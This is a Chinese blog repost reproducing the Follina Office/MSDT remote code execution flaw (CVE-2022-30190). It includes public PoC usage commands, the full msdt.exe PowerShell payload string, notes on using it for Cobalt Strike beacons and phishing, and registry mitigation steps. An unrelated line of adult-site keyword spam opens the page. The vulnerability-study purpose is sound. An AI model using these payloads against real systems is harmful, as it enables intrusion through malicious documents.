国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

這篇具有很好參考價值的文章主要介紹了Windows MSDT RCE(CVE-2022-30190)復現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

介紹

可利用惡意 Office 文件中的遠程模板功能從遠程網(wǎng)絡服務器獲取惡意 HTML 文件,通過微軟支持診斷工具(Microsoft Support Diagnostic Tool,MSDT)執(zhí)行惡意 PowerShell 代碼。該漏洞在宏被禁用的情況下,仍然可以調(diào)用 MSDT 執(zhí)行惡意代碼。并且當惡意文件另存為 RTF 格式時,還可以通過 Windows 資源管理器中的預覽窗格觸發(fā)此 rce 的調(diào)用,無需執(zhí)行也可以在目標機器上執(zhí)行任意代碼。

利用 RCE 能夠在非管理員權限、禁用宏且在 windows defender 開啟的情況下繞過防護,達到上線的效果

RTF是Rich Text Format的縮寫,意即多文本格式。 這是一種類似DOC格式(Word文檔)的文件,有很好的兼容性,使用Windows“附件”中的“寫字板”就能打開并進行編輯。 使用“寫字板”打開一個RTF格式文件時,將看到文件的內(nèi)容;如果要查看RTF格式文件的源代碼,只要使用“記事本”將它打開就行了

影響版本:

目前難以全面統(tǒng)計該 cve 影響的Office版本,微軟官方尚公布該 cve 波及的具體范圍。經(jīng)安天CERT分析人員驗證,確認受該 cve 影響的版本如下:

Microsoft Office 2013 Service Pack 1 (64-bit edition)

Microsoft Office 2013 Service Pack 1 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

Microsoft Office 2016 (32-bit edition)

Microsoft Office LTSC 2021 for 32-bit edition

Microsoft Office LTSC 2021 for 64-bit edition

復現(xiàn)

我這里復現(xiàn)用的版本是:office Microsoft Office LTSC 專業(yè)增強版 2021

Poc:https://github.com/chvancooten/follina.py

提供了很多利用方法

Usage:

$ python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -t {rtf,docx}, --type {rtf,docx}
                        The type of payload to use, can be "docx" or "rtf"
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80
  • 執(zhí)行命令

    python .\follina.py -m command -c calc -t docx
    

    Windows MSDT RCE(CVE-2022-30190)復現(xiàn)
    可以通過 -c 參數(shù)指定 cs 的 powershell 代碼上線 cs

  • 執(zhí)行二進制文件

    python follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080 -t docx
    

生成 docx 文檔后點擊
Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

Poc 分析

分析 Python 代碼

首先根據(jù) -H -p 參數(shù)指定的 IP 和端口生成 payload_url,url 就是生成的 exploit.html 文件位置

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

在上面的代碼中可以看到如果指定模式為 command 就會拼接ms-msdt:開頭的字符串,然后調(diào)用 generate docx 其實就是將 payload_url 拼接到 document.xml-rels.tpl 中然后生成 word 文件

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

之前搞過 郵 件 釣 魚 的同學都應該很清除這里的邏輯是向word\_rels\document.xml.rels寫一個遠程模板地址,CobaltStrike使用:第三篇使用CS進行用戶驅動攻擊(釣魚攻擊)

在來看一下這個 exploit.html 的具體內(nèi)容,可以看到ms-msdt開頭的字符串被拼接到了<script>標簽中,然后調(diào)整轉到這個偽協(xié)議

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

ms-msdt 協(xié)議

在注冊表中找到,其 command 是"%SystemRoot%\system32\msdt.exe" % 1

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)

msdt.exe 是微軟支持診斷工具,官網(wǎng)文檔

官網(wǎng)文檔中給出了語法參數(shù)對照 payload

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
  • /id PCWDiagnostic表示運行 PCWDiagnostic 診斷包

大概意思就是該部分表示要在故障排除階段運行的腳本,發(fā)生故障即觸發(fā) payload 中的 powershell 代碼

修復

禁用MSDT URL協(xié)議

  1. 以管理員身份運行命令提示符

  2. 備份注冊表項后,執(zhí)行命令:reg export HKEY_CLASSES_ROOT\ms-msdt filename

  3. 再執(zhí)行命令:reg delete HKEY_CLASSES_ROOT\ms-msdt /f

若需要撤銷禁用則用管理員身份打開cmd執(zhí)行:reg import filename

受本次 RCE 影響的Office版本目前不便統(tǒng)計,且暫無官方補丁,由此判斷:該漏洞后續(xù)被利用的可能性較大。鑒于本次漏洞影響十分廣泛且危害較大,安天CERT給出下列建議:

  1. 謹慎下載及打開來源不明或內(nèi)容可疑的文檔;

  2. 關閉資源管理器的文件內(nèi)容預覽功能;

  3. 更新終端防病毒程序(及)病毒庫;

  4. 禁用ms-msdt功能,并取消對應的rtf文件類型關聯(lián)。

Follina Microsoft Office RCE with MS-MSDT Protocol

Microsoft Office 遠程代碼執(zhí)行(CVE-2022-30190)風險提示

公眾號:紅隊藍軍,Windows支持診斷工具(MSDT)遠程代碼執(zhí)行(CVE-2022-30190)分析復現(xiàn)_修復

Windows MSDT RCE(CVE-2022-30190)復現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-468393.html

到了這里,關于Windows MSDT RCE(CVE-2022-30190)復現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 【漏洞復現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡介 該文檔使用 Word 遠程模板功能從遠程網(wǎng)絡服務器檢索 HTML 文件,該服務器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(20)
  • [CVE-2022-30190]MICROSOFT OFFICE MSDT代碼執(zhí)行漏洞

    MSDT(Microsoft Support Diagnostics Tool,微軟支持診斷工具)是一個Windows實用程序,用于排除故障并收集診斷數(shù)據(jù)以供專業(yè)人員分析和解決問題。 Shadow Chaser Group 的研究人員在 Twitter 上表示,這個存在于Microsoft Support Diagnostic Tool中的漏洞已經(jīng)于4月 12日報告給微軟,并已經(jīng)證明該漏洞

    2024年02月04日
    瀏覽(16)
  • MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    目錄 漏洞概述 受到影響的產(chǎn)品和版本 漏洞復現(xiàn) 1、搭建靶場 2、攻擊復現(xiàn) 一、執(zhí)行系統(tǒng)程序 二、執(zhí)行系統(tǒng)命令 修復 Microsoft Windows Support Diagnostic Tool是美國微軟(Microsoft)公司的收集信息以發(fā)送給 Microsoft 支持的工具(Windows上的微軟支持診斷工具中存在此漏洞)。當從Word等

    2024年02月06日
    瀏覽(19)
  • H2db console 未授權訪問RCE 漏洞復現(xiàn)+利用(CVE-2022-23221)

    H2db console 未授權訪問RCE 漏洞復現(xiàn)+利用(CVE-2022-23221)

    H2是Thomas Mueller提供的一個開源的、純java實現(xiàn)的關系數(shù)據(jù)庫。H2的主要特點是:非??欤_源,JDBC API;嵌入式和服務器模式;內(nèi)存數(shù)據(jù)庫;基于瀏覽器的控制臺應用程序。 H2 數(shù)據(jù)庫控制臺中的另一個未經(jīng)身份驗證的 RCE 漏洞,在 v2.1.210+ 中修復。2.1.210 之前的 H2 控制臺允許遠

    2024年02月14日
    瀏覽(24)
  • CVE-2022-30190復現(xiàn)及原理

    CVE-2022-30190復現(xiàn)及原理

    今天各廠商都在發(fā)布CVE-2022-30190的安全通告,作為一個與Office有關的RCE漏洞,其原理并不復雜,但利用非常簡單無腦甚至不用點擊,以后釣魚肯定要經(jīng)常用,這里簡單復現(xiàn)分析下。 環(huán)境 Win10.0.16299 32位 Microsoft Office 2013 plus版本 參考項目 https://github.com/onecloudemoji/CVE-2022-30190 參考

    2024年02月05日
    瀏覽(23)
  • CVE漏洞復現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個基礎開源框架,其目的是用于簡化 Java 企業(yè)級應用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報告,Spring Framework存在遠程代碼執(zhí)行漏洞,在 JDK 9+ 上運行的 Spring MVC 或 Spring WebFlux 應用程序可能容易受到通過數(shù)據(jù)綁定的遠程代碼執(zhí)行

    2023年04月21日
    瀏覽(26)
  • Fortinet FortiNAC RCE漏洞復現(xiàn)(CVE-2022-39952)

    ? ? ? FortiNAC(Network Access Control) 是Fortinet的一種零信任網(wǎng)絡訪問控制解決方案,可增強用戶對企業(yè)網(wǎng)絡上的物聯(lián)網(wǎng) (IoT) 設備的監(jiān)控。NAC 是零信任網(wǎng)絡訪問安全模型的重要組成部分,在該模型中,IT 團隊可以輕松了解正在訪問網(wǎng)絡的人員和設備,以及如何保護網(wǎng)絡內(nèi)外的公司資

    2024年02月06日
    瀏覽(23)
  • CVE漏洞復現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    CVE漏洞復現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE

    微服務架構與Spring Cloud 最開始時,我們開發(fā)java項目時,所有的代碼都在一個工程里,我們把它稱為單體架構。當我們的項目的代碼量越來越大時,開發(fā)的成員越來越多時,這時我們項目的性能以及我們開發(fā)的效率都會存在非常大的問題,所以對于這樣的項目,我們需要把它

    2023年04月14日
    瀏覽(26)
  • CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個專業(yè)的企業(yè)知識管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識庫并建立知識管理流程,也可以用于構建企業(yè)wiki。其使用簡單,但它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • CVE-2022-26134 Confluence OGNL 注入復現(xiàn)及后利用

    CVE-2022-26134 Confluence OGNL 注入復現(xiàn)及后利用

    Atlassian Confluence是企業(yè)廣泛使用的wiki系統(tǒng)。2022年6月2日Atlassian官方發(fā)布了一則安全更新,通告了一個嚴重且已在野利用的代碼執(zhí)行漏洞,攻擊者利用這個漏洞即可無需任何條件在Confluence中執(zhí)行任意命令 攻擊者提供的URI將被轉換為namespace,然后該namespace將被轉換為OGNL表達式進

    2023年04月14日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包